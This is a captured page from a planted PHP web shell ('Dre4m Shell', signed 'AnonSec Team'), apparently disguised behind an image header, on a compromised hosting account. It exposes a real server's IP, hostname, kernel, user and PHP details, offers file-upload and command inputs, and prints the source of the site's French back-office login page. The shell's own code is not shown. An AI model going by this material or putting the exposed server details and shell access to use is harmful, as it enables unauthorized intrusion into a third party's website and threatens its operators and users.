ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/atlanticswim.fr/cp-admin/log/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/atlanticswim.fr/cp-admin/log//index.php
<?php
include_once 'includes/db_connect.php';
include_once 'includes/functions.php';
sec_session_start();
if (login_check($mysqli) == true) {
    $logged = 'in';
} else {
    $logged = 'out';
}
  $app_version = 'v7.1';
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Back-Office</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

<!-- Gcms -->
  <link href="../view/javascript/bootstrap/css/bootstrap.css" rel="stylesheet" media="screen" />
  <link href="../view/javascript/font-awesome/css/font-awesome.min.css" type="text/css" rel="stylesheet" />
  <link type="text/css" href="../view/stylesheet/stylesheet.css" rel="stylesheet" media="screen" />
 
<!-- Original -->
  <link href="../assets/css/font-awesome.min.css" rel="stylesheet">
  <link href="../assets/css/bootstrap-responsive.css" rel="stylesheet">
  <link href="../assets/css/style.css?1407166711" rel="stylesheet">
  <link rel="shortcut icon" href="../../../images/favicon.ico">
	
<!-- Secure -->
        <script type="text/JavaScript" src="js/sha512.js"></script> 
        <script type="text/JavaScript" src="js/forms.js"></script>
        <link rel="stylesheet" href="styles/main.css" />
</head>
<body onload="document.forms['login_form'].elements['input-username'].focus()">
<div id="container">
<div id="content">
  <div class="container-fluid"><br />
    <br />
    <div class="row">
      <div class="col-sm-offset-4 col-sm-4">
        <div class="panel panel-login">
          <div class="panel-heading">
            <h1 class="panel-title"><i class="fa fa-lock"></i>&nbsp;Back-office : <?php echo $app_version; ?></h1>
         <font size="2">&nbsp;</font></div>
          <div class="panel-body">
            <?php if ($success) { ?>
            <div class="alert alert-success"><i class="fa fa-check-circle"></i> <?php echo $success; ?>
              <button type="button" class="close" data-dismiss="alert">×</button>
            </div>
            <?php } ?>
            <?php if ($error_warning) { ?>
            <div class="alert alert-danger"><i class="fa fa-exclamation-circle"></i> <?php echo $error_warning; ?>
              <button type="button" class="close" data-dismiss="alert">×</button>
            </div>
            <?php } ?>

         <form action="includes/process_login.php" method="post" name="login_form"> 			
              <div class="form-group">
                <label for="input-username">E-mail</label>
                <div class="input-group"><span class="input-group-addon"><i class="fa fa-user"></i></span>
                 <input type="text" name="email"  placeholder="Votre adresse E-mail" id="input-username" class="form-control" />
                </div>
              </div>
              
              <div class="form-group">
                <label for="input-password">Mot de passe</label>
                <div class="input-group"><span class="input-group-addon"><i class="fa fa-lock"></i></span>
                  <input type="password" name="password" id="password" placeholder="Votre Mot de passe"  class="form-control" />
                </div>
               <span class="help-block"><a href="http://www.seomedias.com/nous-contacter"><i>Mot de passe oublié</i></a></span>
              </div>
           </div>
              <div class="panel-footer">
                <button type="submit"  value="Login"   onclick="formhash(this.form, this.form.password);"     class="btn btn-primary"><i class="icon-signin"></i> 
				Connexion</button>
              </div>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>
<?php
include_once('../includes/footer.php');
?>







 
    </body>
</html>

Anon7 - 2022
AnonSec Team